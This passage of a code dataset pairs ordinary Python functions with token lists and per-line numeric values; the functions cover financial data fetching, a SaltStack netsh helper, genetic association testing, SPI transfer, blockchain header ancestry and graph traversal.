0.08333333333333333,
0.09090909090909091,
0.09090909090909091,
0.03773584905660377,
0.044444444444444446
] |
def fetch(self, tickers, fields=None, date=None, date_from=None, date_to=None,
freq='D', only_data=True, static=False):
"""Fetch data from TR DWE.
tickers - ticker or list of tickers
fields - list of fields.
date - date for a single-date query
date_from, date_to - date range (used only if "date" is not specified)
freq - frequency of data: daily('D'), weekly('W') or monthly('M')
only_data - if True then metadata will not be returned
static - if True "static" request is created (i.e. not a series).
In this case 'date_from', 'date_to' and 'freq' are ignored
In case list of tickers is requested, a MultiIndex-dataframe is returned.
Some of available fields:
P - adjusted closing price
PO - opening price
PH - high price
PL - low price
VO - volume, which is expressed in 1000's of shares.
UP - unadjusted price
OI - open interest
MV - market value
EPS - earnings per share
DI - dividend index
MTVB - market to book value
PTVB - price to book value
...
The full list of data fields is available at http://dtg.tfn.com/.
"""
if static:
query = self.construct_request(tickers, fields, date, freq='REP')
else:
query = self.construct_request(tickers, fields, date, date_from, date_to, freq)
raw = self.request(query)
if static:
data, metadata = self.parse_record_static(raw)
elif isinstance(tickers, basestring) or len(tickers) == 1:
data, metadata = self.parse_record(raw)
elif hasattr(tickers, '__len__'):
metadata = pd.DataFrame()
data = {}
for indx in range(len(tickers)):
dat, meta = self.parse_record(raw, indx)
data[tickers[indx]] = dat
metadata = metadata.append(meta, ignore_index=False)
data = pd.concat(data)
else:
raise DatastreamException(('First argument should be either ticker or '
'list of tickers'))
if only_data:
return data
else:
return data, metadata | [
"def",
"fetch",
"(",
"self",
",",
"tickers",
",",
"fields",
"=",
"None",
",",
"date",
"=",
"None",
",",
"date_from",
"=",
"None",
",",
"date_to",
"=",
"None",
",",
"freq",
"=",
"'D'",
",",
"only_data",
"=",
"True",
",",
"static",
"=",
"False",
")",
":",
"if",
"static",
":",
"query",
"=",
"self",
".",
"construct_request",
"(",
"tickers",
",",
"fields",
",",
"date",
",",
"freq",
"=",
"'REP'",
")",
"else",
":",
"query",
"=",
"self",
".",
"construct_request",
"(",
"tickers",
",",
"fields",
",",
"date",
",",
"date_from",
",",
"date_to",
",",
"freq",
")",
"raw",
"=",
"self",
".",
"request",
"(",
"query",
")",
"if",
"static",
":",
"data",
",",
"metadata",
"=",
"self",
".",
"parse_record_static",
"(",
"raw",
")",
"elif",
"isinstance",
"(",
"tickers",
",",
"basestring",
")",
"or",
"len",
"(",
"tickers",
")",
"==",
"1",
":",
"data",
",",
"metadata",
"=",
"self",
".",
"parse_record",
"(",
"raw",
")",
"elif",
"hasattr",
"(",
"tickers",
",",
"'__len__'",
")",
":",
"metadata",
"=",
"pd",
".",
"DataFrame",
"(",
")",
"data",
"=",
"{",
"}",
"for",
"indx",
"in",
"range",
"(",
"len",
"(",
"tickers",
")",
")",
":",
"dat",
",",
"meta",
"=",
"self",
".",
"parse_record",
"(",
"raw",
",",
"indx",
")",
"data",
"[",
"tickers",
"[",
"indx",
"]",
"]",
"=",
"dat",
"metadata",
"=",
"metadata",
".",
"append",
"(",
"meta",
",",
"ignore_index",
"=",
"False",
")",
"data",
"=",
"pd",
".",
"concat",
"(",
"data",
")",
"else",
":",
"raise",
"DatastreamException",
"(",
"(",
"'First argument should be either ticker or '",
"'list of tickers'",
")",
")",
"if",
"only_data",
":",
"return",
"data",
"else",
":",
"return",
"data",
",",
"metadata"
] | 38.032787 | [
0.02564102564102564,
0.12962962962962962,
0.058823529411764705,
0,
0.06521739130434782,
0.1111111111111111,
0.08163265306122448,
0.06172839506172839,
0.05063291139240506,
0.046153846153846156,
0.06493506493506493,
0.0379746835443038,
0,
0.047619047619047616,
0,
0.08333333333333333,
0.10526315789473684,
0.10344827586206896,
0.11538461538461539,
0.12,
0.047619047619047616,
0.09375,
0.10344827586206896,
0,
0.10714285714285714,
0.08571428571428572,
0.1,
0.07894736842105263,
0.08108108108108109,
0.21428571428571427,
0,
0.05263157894736842,
0.18181818181818182,
0.1111111111111111,
0.025974025974025976,
0.15384615384615385,
0.03296703296703297,
0,
0.06060606060606061,
0,
0.1111111111111111,
0.034482758620689655,
0.030303030303030304,
0.0392156862745098,
0.04878048780487805,
0.05405405405405406,
0.09523809523809523,
0.045454545454545456,
0.03571428571428571,
0.04878048780487805,
0.029411764705882353,
0,
0.058823529411764705,
0.15384615384615385,
0.04819277108433735,
0.06896551724137931,
0,
0.09523809523809523,
0.08695652173913043,
0.15384615384615385,
0.06060606060606061
] |
def _netsh_file(content):
'''
helper function to get the results of ``netsh -f content.txt``
Running ``netsh`` will drop you into a ``netsh`` prompt where you can issue
``netsh`` commands. You can put a series of commands in an external file and
run them as if from a ``netsh`` prompt using the ``-f`` switch. That's what
this function does.
Args:
content (str):
The contents of the file that will be run by the ``netsh -f``
command
Returns:
str: The text returned by the netsh command
'''
with tempfile.NamedTemporaryFile(mode='w',
prefix='salt-',
suffix='.netsh',
delete=False) as fp:
fp.write(content)
try:
log.debug('%s:\n%s', fp.name, content)
return salt.modules.cmdmod.run('netsh -f {0}'.format(fp.name), python_shell=True)
finally:
os.remove(fp.name) | [
"def",
"_netsh_file",
"(",
"content",
")",
":",
"with",
"tempfile",
".",
"NamedTemporaryFile",
"(",
"mode",
"=",
"'w'",
",",
"prefix",
"=",
"'salt-'",
",",
"suffix",
"=",
"'.netsh'",
",",
"delete",
"=",
"False",
")",
"as",
"fp",
":",
"fp",
".",
"write",
"(",
"content",
")",
"try",
":",
"log",
".",
"debug",
"(",
"'%s:\\n%s'",
",",
"fp",
".",
"name",
",",
"content",
")",
"return",
"salt",
".",
"modules",
".",
"cmdmod",
".",
"run",
"(",
"'netsh -f {0}'",
".",
"format",
"(",
"fp",
".",
"name",
")",
",",
"python_shell",
"=",
"True",
")",
"finally",
":",
"os",
".",
"remove",
"(",
"fp",
".",
"name",
")"
] | 34.5 | [
0.04,
0.2857142857142857,
0.06060606060606061,
0,
0.0379746835443038,
0.05,
0.05063291139240506,
0.08695652173913043,
0,
0.2222222222222222,
0,
0.13636363636363635,
0.0547945205479452,
0.10526315789473684,
0,
0.16666666666666666,
0.0392156862745098,
0.2857142857142857,
0.06521739130434782,
0.07692307692307693,
0.07547169811320754,
0.08771929824561403,
0.08,
0.25,
0.043478260869565216,
0.033707865168539325,
0.16666666666666666,
0.07692307692307693
] |
def simple_interaction_kronecker(snps,phenos,covs=None,Acovs=None,Asnps1=None,Asnps0=None,K1r=None,K1c=None,K2r=None,K2c=None,covar_type='lowrank_diag',rank=1,NumIntervalsDelta0=100,NumIntervalsDeltaAlt=0,searchDelta=False):
"""
I-variate fixed effects interaction test for phenotype specific SNP effects
Args:
snps: [N x S] SP.array of S SNPs for N individuals (test SNPs)
phenos: [N x P] SP.array of P phenotypes for N individuals
covs: list of SP.arrays holding covariates. Each covs[i] has one corresponding Acovs[i]
Acovs: list of SP.arrays holding the phenotype design matrices for covariates.
Each covs[i] has one corresponding Acovs[i].
Asnps1: list of SP.arrays of I interaction variables to be tested for N
individuals. Note that it is assumed that Asnps0 is already included.
If not provided, the alternative model will be the independent model
Asnps0: single SP.array of I0 interaction variables to be included in the
background model when testing for interaction with Inters
K1r: [N x N] SP.array of LMM-covariance/kinship koefficients (optional)
If not provided, then linear regression analysis is performed
K1c: [P x P] SP.array of LMM-covariance/kinship koefficients (optional)
If not provided, then linear regression analysis is performed
K2r: [N x N] SP.array of LMM-covariance/kinship koefficients (optional)
If not provided, then linear regression analysis is performed
K2c: [P x P] SP.array of LMM-covariance/kinship koefficients (optional)
If not provided, then linear regression analysis is performed
covar_type: type of covaraince to use. Default 'freeform'. possible values are
'freeform': free form optimization,
'fixed': use a fixed matrix specified in covar_K0,
'diag': optimize a diagonal matrix,
'lowrank': optimize a low rank matrix. The rank of the lowrank part is specified in the variable rank,
'lowrank_id': optimize a low rank matrix plus the weight of a constant diagonal matrix. The rank of the lowrank part is specified in the variable rank,
'lowrank_diag': optimize a low rank matrix plus a free diagonal matrix. The rank of the lowrank part is specified in the variable rank,
'block': optimize the weight of a constant P x P block matrix of ones,
'block_id': optimize the weight of a constant P x P block matrix of ones plus the weight of a constant diagonal matrix,
'block_diag': optimize the weight of a constant P x P block matrix of ones plus a free diagonal matrix,
rank: rank of a possible lowrank component (default 1)
NumIntervalsDelta0: number of steps for delta optimization on the null model (100)
NumIntervalsDeltaAlt:number of steps for delta optimization on the alt. model (0 - no optimization)
searchDelta: Carry out delta optimization on the alternative model? if yes We use NumIntervalsDeltaAlt steps
Returns:
pv: P-values of the interaction test
pv0: P-values of the null model
pvAlt: P-values of the alternative model
"""
S=snps.shape[1]
#0. checks
N = phenos.shape[0]
P = phenos.shape[1]
if K1r==None:
K1r = SP.dot(snps,snps.T)
else:
assert K1r.shape[0]==N, 'K1r: dimensions dismatch'
assert K1r.shape[1]==N, 'K1r: dimensions dismatch'
if K2r==None:
K2r = SP.eye(N)
else:
assert K2r.shape[0]==N, 'K2r: dimensions dismatch'
assert K2r.shape[1]==N, 'K2r: dimensions dismatch'
covs,Acovs = updateKronCovs(covs,Acovs,N,P)
#Asnps can be several designs
if (Asnps0 is None):
Asnps0 = [SP.ones([1,P])]
if Asnps1 is None:
Asnps1 = [SP.eye([P])]
if (type(Asnps0)!=list):
Asnps0 = [Asnps0]
if (type(Asnps1)!=list):
Asnps1 = [Asnps1]
assert (len(Asnps0)==1) and (len(Asnps1)>0), "need at least one Snp design matrix for null and alt model"
#one row per column design matrix
pv = SP.zeros((len(Asnps1),snps.shape[1]))
lrt = SP.zeros((len(Asnps1),snps.shape[1]))
pvAlt = SP.zeros((len(Asnps1),snps.shape[1]))
lrtAlt = SP.zeros((len(Asnps1),snps.shape[1]))
#1. run GP model to infer suitable covariance structure
if K1c==None or K2c==None:
vc = estimateKronCovariances(phenos=phenos, K1r=K1r, K2r=K2r, K1c=K1c, K2c=K2c, covs=covs, Acovs=Acovs, covar_type=covar_type, rank=rank)
K1c = vc.getEstTraitCovar(0)
K2c = vc.getEstTraitCovar(1)
else:
assert K1c.shape[0]==P, 'K1c: dimensions dismatch'
assert K1c.shape[1]==P, 'K1c: dimensions dismatch'
assert K2c.shape[0]==P, 'K2c: dimensions dismatch'
assert K2c.shape[1]==P, 'K2c: dimensions dismatch'
#2. run kroneckerLMM for null model
lmm = limix.CKroneckerLMM()
lmm.setK1r(K1r)
lmm.setK1c(K1c)
lmm.setK2r(K2r)
lmm.setK2c(K2c)
lmm.setSNPs(snps)
#add covariates
for ic in range(len(Acovs)):
lmm.addCovariates(covs[ic],Acovs[ic])
lmm.setPheno(phenos)
#delta serch on alt. model?
if searchDelta:
lmm.setNumIntervalsAlt(NumIntervalsDeltaAlt)
lmm.setNumIntervals0_inter(NumIntervalsDeltaAlt)
else:
lmm.setNumIntervalsAlt(0)
lmm.setNumIntervals0_inter(0)
lmm.setNumIntervals0(NumIntervalsDelta0)
#add SNP design
lmm.setSNPcoldesign0_inter(Asnps0[0])
for iA in range(len(Asnps1)):
lmm.setSNPcoldesign(Asnps1[iA])
lmm.process()
pvAlt[iA,:] = lmm.getPv()[0]
pv[iA,:] = lmm.getPv()[1]
pv0 = lmm.getPv()[2]
return pv,pv0,pvAlt | [
"def",
"simple_interaction_kronecker",
"(",
"snps",
",",
"phenos",
",",
"covs",
"=",
"None",
",",
"Acovs",
"=",
"None",
",",
"Asnps1",
"=",
"None",
",",
"Asnps0",
"=",
"None",
",",
"K1r",
"=",
"None",
",",
"K1c",
"=",
"None",
",",
"K2r",
"=",
"None",
",",
"K2c",
"=",
"None",
",",
"covar_type",
"=",
"'lowrank_diag'",
",",
"rank",
"=",
"1",
",",
"NumIntervalsDelta0",
"=",
"100",
",",
"NumIntervalsDeltaAlt",
"=",
"0",
",",
"searchDelta",
"=",
"False",
")",
":",
"S",
"=",
"snps",
".",
"shape",
"[",
"1",
"]",
"#0. checks",
"N",
"=",
"phenos",
".",
"shape",
"[",
"0",
"]",
"P",
"=",
"phenos",
".",
"shape",
"[",
"1",
"]",
"if",
"K1r",
"==",
"None",
":",
"K1r",
"=",
"SP",
".",
"dot",
"(",
"snps",
",",
"snps",
".",
"T",
")",
"else",
":",
"assert",
"K1r",
".",
"shape",
"[",
"0",
"]",
"==",
"N",
",",
"'K1r: dimensions dismatch'",
"assert",
"K1r",
".",
"shape",
"[",
"1",
"]",
"==",
"N",
",",
"'K1r: dimensions dismatch'",
"if",
"K2r",
"==",
"None",
":",
"K2r",
"=",
"SP",
".",
"eye",
"(",
"N",
")",
"else",
":",
"assert",
"K2r",
".",
"shape",
"[",
"0",
"]",
"==",
"N",
",",
"'K2r: dimensions dismatch'",
"assert",
"K2r",
".",
"shape",
"[",
"1",
"]",
"==",
"N",
",",
"'K2r: dimensions dismatch'",
"covs",
",",
"Acovs",
"=",
"updateKronCovs",
"(",
"covs",
",",
"Acovs",
",",
"N",
",",
"P",
")",
"#Asnps can be several designs",
"if",
"(",
"Asnps0",
"is",
"None",
")",
":",
"Asnps0",
"=",
"[",
"SP",
".",
"ones",
"(",
"[",
"1",
",",
"P",
"]",
")",
"]",
"if",
"Asnps1",
"is",
"None",
":",
"Asnps1",
"=",
"[",
"SP",
".",
"eye",
"(",
"[",
"P",
"]",
")",
"]",
"if",
"(",
"type",
"(",
"Asnps0",
")",
"!=",
"list",
")",
":",
"Asnps0",
"=",
"[",
"Asnps0",
"]",
"if",
"(",
"type",
"(",
"Asnps1",
")",
"!=",
"list",
")",
":",
"Asnps1",
"=",
"[",
"Asnps1",
"]",
"assert",
"(",
"len",
"(",
"Asnps0",
")",
"==",
"1",
")",
"and",
"(",
"len",
"(",
"Asnps1",
")",
">",
"0",
")",
",",
"\"need at least one Snp design matrix for null and alt model\"",
"#one row per column design matrix",
"pv",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"lrt",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"pvAlt",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"lrtAlt",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"#1. run GP model to infer suitable covariance structure",
"if",
"K1c",
"==",
"None",
"or",
"K2c",
"==",
"None",
":",
"vc",
"=",
"estimateKronCovariances",
"(",
"phenos",
"=",
"phenos",
",",
"K1r",
"=",
"K1r",
",",
"K2r",
"=",
"K2r",
",",
"K1c",
"=",
"K1c",
",",
"K2c",
"=",
"K2c",
",",
"covs",
"=",
"covs",
",",
"Acovs",
"=",
"Acovs",
",",
"covar_type",
"=",
"covar_type",
",",
"rank",
"=",
"rank",
")",
"K1c",
"=",
"vc",
".",
"getEstTraitCovar",
"(",
"0",
")",
"K2c",
"=",
"vc",
".",
"getEstTraitCovar",
"(",
"1",
")",
"else",
":",
"assert",
"K1c",
".",
"shape",
"[",
"0",
"]",
"==",
"P",
",",
"'K1c: dimensions dismatch'",
"assert",
"K1c",
".",
"shape",
"[",
"1",
"]",
"==",
"P",
",",
"'K1c: dimensions dismatch'",
"assert",
"K2c",
".",
"shape",
"[",
"0",
"]",
"==",
"P",
",",
"'K2c: dimensions dismatch'",
"assert",
"K2c",
".",
"shape",
"[",
"1",
"]",
"==",
"P",
",",
"'K2c: dimensions dismatch'",
"#2. run kroneckerLMM for null model",
"lmm",
"=",
"limix",
".",
"CKroneckerLMM",
"(",
")",
"lmm",
".",
"setK1r",
"(",
"K1r",
")",
"lmm",
".",
"setK1c",
"(",
"K1c",
")",
"lmm",
".",
"setK2r",
"(",
"K2r",
")",
"lmm",
".",
"setK2c",
"(",
"K2c",
")",
"lmm",
".",
"setSNPs",
"(",
"snps",
")",
"#add covariates",
"for",
"ic",
"in",
"range",
"(",
"len",
"(",
"Acovs",
")",
")",
":",
"lmm",
".",
"addCovariates",
"(",
"covs",
"[",
"ic",
"]",
",",
"Acovs",
"[",
"ic",
"]",
")",
"lmm",
".",
"setPheno",
"(",
"phenos",
")",
"#delta serch on alt. model?",
"if",
"searchDelta",
":",
"lmm",
".",
"setNumIntervalsAlt",
"(",
"NumIntervalsDeltaAlt",
")",
"lmm",
".",
"setNumIntervals0_inter",
"(",
"NumIntervalsDeltaAlt",
")",
"else",
":",
"lmm",
".",
"setNumIntervalsAlt",
"(",
"0",
")",
"lmm",
".",
"setNumIntervals0_inter",
"(",
"0",
")",
"lmm",
".",
"setNumIntervals0",
"(",
"NumIntervalsDelta0",
")",
"#add SNP design",
"lmm",
".",
"setSNPcoldesign0_inter",
"(",
"Asnps0",
"[",
"0",
"]",
")",
"for",
"iA",
"in",
"range",
"(",
"len",
"(",
"Asnps1",
")",
")",
":",
"lmm",
".",
"setSNPcoldesign",
"(",
"Asnps1",
"[",
"iA",
"]",
")",
"lmm",
".",
"process",
"(",
")",
"pvAlt",
"[",
"iA",
",",
":",
"]",
"=",
"lmm",
".",
"getPv",
"(",
")",
"[",
"0",
"]",
"pv",
"[",
"iA",
",",
":",
"]",
"=",
"lmm",
".",
"getPv",
"(",
")",
"[",
"1",
"]",
"pv0",
"=",
"lmm",
".",
"getPv",
"(",
")",
"[",
"2",
"]",
"return",
"pv",
",",
"pv0",
",",
"pvAlt"
] | 49.024793 | [
0.07142857142857142,
0.2857142857142857,
0.02531645569620253,
0,
0.2222222222222222,
0.041666666666666664,
0.030303030303030304,
0.02857142857142857,
0.031578947368421054,
0.029411764705882353,
0.034482758620689655,
0.03225806451612903,
0.03260869565217391,
0.033707865168539325,
0.037037037037037035,
0.04878048780487805,
0.03529411764705882,
0.04878048780487805,
0.03529411764705882,
0.04878048780487805,
0.03529411764705882,
0.04878048780487805,
0.03529411764705882,
0.03333333333333333,
0.03389830508474576,
0.02702702702702703,
0.03389830508474576,
0.023809523809523808,
0.017142857142857144,
0.018867924528301886,
0.031914893617021274,
0.02097902097902098,
0.023622047244094488,
0.041666666666666664,
0.04395604395604396,
0.04672897196261682,
0.025,
0.16666666666666666,
0.041666666666666664,
0.047619047619047616,
0.04081632653061224,
0.2857142857142857,
0.15789473684210525,
0.21428571428571427,
0.125,
0.125,
0,
0.23529411764705882,
0.09090909090909091,
0.2222222222222222,
0.05172413793103448,
0.05172413793103448,
0,
0.23529411764705882,
0.08695652173913043,
0.2222222222222222,
0.05172413793103448,
0.05172413793103448,
0,
0.1276595744680851,
0,
0.09090909090909091,
0.08333333333333333,
0.09090909090909091,
0.09090909090909091,
0.06666666666666667,
0.10714285714285714,
0.08,
0.10714285714285714,
0.08,
0.045871559633027525,
0,
0.08108108108108109,
0.06521739130434782,
0.06382978723404255,
0.061224489795918366,
0.06,
0,
0.05084745762711865,
0.2,
0.020689655172413793,
0.05555555555555555,
0.05555555555555555,
0.2222222222222222,
0.05172413793103448,
0.05172413793103448,
0.05172413793103448,
0.05172413793103448,
0,
0.07692307692307693,
0.06451612903225806,
0.10526315789473684,
0.10526315789473684,
0.10526315789473684,
0.10526315789473684,
0.09523809523809523,
0.15789473684210525,
0.09090909090909091,
0.06666666666666667,
0.08333333333333333,
0,
0.0967741935483871,
0.10526315789473684,
0.038461538461538464,
0.03571428571428571,
0.2222222222222222,
0.06060606060606061,
0.05405405405405406,
0,
0,
0.045454545454545456,
0.15789473684210525,
0.04878048780487805,
0.06060606060606061,
0.05128205128205128,
0.09523809523809523,
0,
0.08333333333333333,
0.09090909090909091,
0.07142857142857142,
0.17391304347826086
] |
def get_hints(code_list, k=10, hint_folder=HINT_FOLDER, current_tokens=None):
"""
Fetch first k hints for given code_list
"""
def hint_score(v, size):
"""
The formula for hint score
"""
return 1.0 - abs(v / (size + 1) - 0.5)
if len(code_list) <= 1:
return [], []
if current_tokens is None:
current_tokens = []
size = min(len(code_list), MAX_HINT_SMAPLING_SIZE)
sample = random.sample(code_list, size)
hint_list = []
capital_dict = {}
for code in sample:
path = gen_path(hint_folder, code)
fp = os.path.join(path, code)
try:
with open(fp) as f:
hints = set(f.read().strip().split('\n'))
hint_list.extend([h.lower() for h in hints])
capital_dict.update({hint.lower(): hint for hint in hints})
except FileNotFoundError:
logging.warning("FileNotFoundError: No such file: %r" % fp )
document_freq = Counter(hint_list)
score = [(capital_dict[k], hint_score(v, size)) \
for k, v in document_freq.items() if k not in current_tokens]
if len(score) == 0:
return [], []
score.sort(key=lambda x: x[1], reverse=True)
hints, scores = tuple(list(zip(*score[:k])))
return hints, scores | [
"def",
"get_hints",
"(",
"code_list",
",",
"k",
"=",
"10",
",",
"hint_folder",
"=",
"HINT_FOLDER",
",",
"current_tokens",
"=",
"None",
")",
":",
"def",
"hint_score",
"(",
"v",
",",
"size",
")",
":",
"\"\"\"\n The formula for hint score\n \"\"\"",
"return",
"1.0",
"-",
"abs",
"(",
"v",
"/",
"(",
"size",
"+",
"1",
")",
"-",
"0.5",
")",
"if",
"len",
"(",
"code_list",
")",
"<=",
"1",
":",
"return",
"[",
"]",
",",
"[",
"]",
"if",
"current_tokens",
"is",
"None",
":",
"current_tokens",
"=",
"[",
"]",
"size",
"=",
"min",
"(",
"len",
"(",
"code_list",
")",
",",
"MAX_HINT_SMAPLING_SIZE",
")",
"sample",
"=",
"random",
".",
"sample",
"(",
"code_list",
",",
"size",
")",
"hint_list",
"=",
"[",
"]",
"capital_dict",
"=",
"{",
"}",
"for",
"code",
"in",
"sample",
":",
"path",
"=",
"gen_path",
"(",
"hint_folder",
",",
"code",
")",
"fp",
"=",
"os",
".",
"path",
".",
"join",
"(",
"path",
",",
"code",
")",
"try",
":",
"with",
"open",
"(",
"fp",
")",
"as",
"f",
":",
"hints",
"=",
"set",
"(",
"f",
".",
"read",
"(",
")",
".",
"strip",
"(",
")",
".",
"split",
"(",
"'\\n'",
")",
")",
"hint_list",
".",
"extend",
"(",
"[",
"h",
".",
"lower",
"(",
")",
"for",
"h",
"in",
"hints",
"]",
")",
"capital_dict",
".",
"update",
"(",
"{",
"hint",
".",
"lower",
"(",
")",
":",
"hint",
"for",
"hint",
"in",
"hints",
"}",
")",
"except",
"FileNotFoundError",
":",
"logging",
".",
"warning",
"(",
"\"FileNotFoundError: No such file: %r\"",
"%",
"fp",
")",
"document_freq",
"=",
"Counter",
"(",
"hint_list",
")",
"score",
"=",
"[",
"(",
"capital_dict",
"[",
"k",
"]",
",",
"hint_score",
"(",
"v",
",",
"size",
")",
")",
"for",
"k",
",",
"v",
"in",
"document_freq",
".",
"items",
"(",
")",
"if",
"k",
"not",
"in",
"current_tokens",
"]",
"if",
"len",
"(",
"score",
")",
"==",
"0",
":",
"return",
"[",
"]",
",",
"[",
"]",
"score",
".",
"sort",
"(",
"key",
"=",
"lambda",
"x",
":",
"x",
"[",
"1",
"]",
",",
"reverse",
"=",
"True",
")",
"hints",
",",
"scores",
"=",
"tuple",
"(",
"list",
"(",
"zip",
"(",
"*",
"score",
"[",
":",
"k",
"]",
")",
")",
")",
"return",
"hints",
",",
"scores"
] | 31.9 | [
0.012987012987012988,
0.2857142857142857,
0.046511627906976744,
0.2857142857142857,
0,
0.07142857142857142,
0.18181818181818182,
0.058823529411764705,
0.18181818181818182,
0.043478260869565216,
0,
0.07407407407407407,
0.09523809523809523,
0,
0.06666666666666667,
0.07407407407407407,
0,
0.037037037037037035,
0.046511627906976744,
0.1111111111111111,
0.09523809523809523,
0,
0.08695652173913043,
0.047619047619047616,
0.05405405405405406,
0.16666666666666666,
0.06451612903225806,
0.03508771929824561,
0.03333333333333333,
0.02666666666666667,
0.06060606060606061,
0.041666666666666664,
0.05263157894736842,
0.05660377358490566,
0.05405405405405406,
0.08695652173913043,
0.09523809523809523,
0.041666666666666664,
0.041666666666666664,
0.08333333333333333
] |
def get_auth(self):
"""Returns auth response which has client token unless MFA is required"""
auth_resp = get_with_retry(self.cerberus_url + '/v2/auth/user',
auth=(self.username, self.password),
headers=self.HEADERS)
if auth_resp.status_code != 200:
throw_if_bad_response(auth_resp)
return auth_resp.json() | [
"def",
"get_auth",
"(",
"self",
")",
":",
"auth_resp",
"=",
"get_with_retry",
"(",
"self",
".",
"cerberus_url",
"+",
"'/v2/auth/user'",
",",
"auth",
"=",
"(",
"self",
".",
"username",
",",
"self",
".",
"password",
")",
",",
"headers",
"=",
"self",
".",
"HEADERS",
")",
"if",
"auth_resp",
".",
"status_code",
"!=",
"200",
":",
"throw_if_bad_response",
"(",
"auth_resp",
")",
"return",
"auth_resp",
".",
"json",
"(",
")"
] | 40.9 | [
0.05263157894736842,
0.037037037037037035,
0.04225352112676056,
0.057971014492753624,
0.09259259259259259,
0,
0.05,
0.045454545454545456,
0,
0.06451612903225806
] |
def store_job_output(self, credentials, job_details, vm_instance_name):
"""
Store the output of a finished job.
:param credentials: jobapi.Credentials: user's credentials used to upload resulting files
:param job_details: object: details about job(id, name, created date, workflow version)
:param vm_instance_name: name of the instance lando_worker is running on (this passed back in the response)
"""
payload = StoreJobOutputPayload(credentials, job_details, vm_instance_name)
self._send(JobCommands.STORE_JOB_OUTPUT, payload) | [
"def",
"store_job_output",
"(",
"self",
",",
"credentials",
",",
"job_details",
",",
"vm_instance_name",
")",
":",
"payload",
"=",
"StoreJobOutputPayload",
"(",
"credentials",
",",
"job_details",
",",
"vm_instance_name",
")",
"self",
".",
"_send",
"(",
"JobCommands",
".",
"STORE_JOB_OUTPUT",
",",
"payload",
")"
] | 64.777778 | [
0.014084507042253521,
0.18181818181818182,
0.046511627906976744,
0.041237113402061855,
0.042105263157894736,
0.043478260869565216,
0.18181818181818182,
0.03614457831325301,
0.03508771929824561
] |
def transfer(self, data):
"""Transfers data over SPI.
Arguments:
data: The data to transfer.
Returns:
The data returned by the SPI device.
"""
settings = self.transfer_settings
settings.spi_tx_size = len(data)
self.transfer_settings = settings
response = ''
for i in range(0, len(data), 60):
response += self.sendCommand(commands.SPITransferCommand(data[i:i + 60])).data
time.sleep(0.01)
while len(response) < len(data):
response += self.sendCommand(commands.SPITransferCommand('')).data
return ''.join(response) | [
"def",
"transfer",
"(",
"self",
",",
"data",
")",
":",
"settings",
"=",
"self",
".",
"transfer_settings",
"settings",
".",
"spi_tx_size",
"=",
"len",
"(",
"data",
")",
"self",
".",
"transfer_settings",
"=",
"settings",
"response",
"=",
"''",
"for",
"i",
"in",
"range",
"(",
"0",
",",
"len",
"(",
"data",
")",
",",
"60",
")",
":",
"response",
"+=",
"self",
".",
"sendCommand",
"(",
"commands",
".",
"SPITransferCommand",
"(",
"data",
"[",
"i",
":",
"i",
"+",
"60",
"]",
")",
")",
".",
"data",
"time",
".",
"sleep",
"(",
"0.01",
")",
"while",
"len",
"(",
"response",
")",
"<",
"len",
"(",
"data",
")",
":",
"response",
"+=",
"self",
".",
"sendCommand",
"(",
"commands",
".",
"SPITransferCommand",
"(",
"''",
")",
")",
".",
"data",
"return",
"''",
".",
"join",
"(",
"response",
")"
] | 29.272727 | [
0.04,
0.05714285714285714,
0,
0.1111111111111111,
0.05128205128205128,
0,
0.125,
0.041666666666666664,
0.18181818181818182,
0.04878048780487805,
0.05,
0.04878048780487805,
0,
0.09523809523809523,
0.04878048780487805,
0.03333333333333333,
0.07142857142857142,
0,
0.05,
0.02564102564102564,
0,
0.0625
] |
def _find_new_ancestors(cls, db: BaseDB, header: BlockHeader) -> Iterable[BlockHeader]:
"""
Returns the chain leading up from the given header until (but not including)
the first ancestor it has in common with our canonical chain.
If D is the canonical head in the following chain, and F is the new header,
then this function returns (F, E).
A - B - C - D
\
E - F
"""
h = header
while True:
try:
orig = cls._get_canonical_block_header_by_number(db, h.block_number)
except HeaderNotFound:
# This just means the block is not on the canonical chain.
pass
else:
if orig.hash == h.hash:
# Found the common ancestor, stop.
break
# Found a new ancestor
yield h
if h.parent_hash == GENESIS_PARENT_HASH:
break
else:
h = cls._get_block_header_by_hash(db, h.parent_hash) | [
"def",
"_find_new_ancestors",
"(",
"cls",
",",
"db",
":",
"BaseDB",
",",
"header",
":",
"BlockHeader",
")",
"->",
"Iterable",
"[",
"BlockHeader",
"]",
":",
"h",
"=",
"header",
"while",
"True",
":",
"try",
":",
"orig",
"=",
"cls",
".",
"_get_canonical_block_header_by_number",
"(",
"db",
",",
"h",
".",
"block_number",
")",
"except",
"HeaderNotFound",
":",
"# This just means the block is not on the canonical chain.",
"pass",
"else",
":",
"if",
"orig",
".",
"hash",
"==",
"h",
".",
"hash",
":",
"# Found the common ancestor, stop.",
"break",
"# Found a new ancestor",
"yield",
"h",
"if",
"h",
".",
"parent_hash",
"==",
"GENESIS_PARENT_HASH",
":",
"break",
"else",
":",
"h",
"=",
"cls",
".",
"_get_block_header_by_hash",
"(",
"db",
",",
"h",
".",
"parent_hash",
")"
] | 34.064516 | [
0.022988505747126436,
0.18181818181818182,
0.047619047619047616,
0.028985507246376812,
0,
0.03614457831325301,
0.07142857142857142,
0,
0.09523809523809523,
0.1875,
0.09523809523809523,
0.18181818181818182,
0.1111111111111111,
0.10526315789473684,
0.125,
0.03571428571428571,
0.058823529411764705,
0.02702702702702703,
0.1,
0.11764705882352941,
0.05128205128205128,
0.037037037037037035,
0.08,
0,
0.058823529411764705,
0.10526315789473684,
0,
0.038461538461538464,
0.09523809523809523,
0.11764705882352941,
0.029411764705882353
] |
def step(g, n1, n2, inbound=False, backward=False, continue_fn=None):
"""
Step along a path through a directed graph unless there is an intersection
Example graph:
Note that edge (1, 2) and (2, 3) are bidirectional, i.e., (2, 1) and
(3, 2) are also edges
1 -- 2 -- 3 -->-- 5 -->-- 7
| |
^ v
| |
4 6
>>> step(g, 1, 2)
3
>>> step(g, 3, 5)
None
>>> step(g, 2, 3)
5
>>> step(g, 2, 3, inbound=True)
None
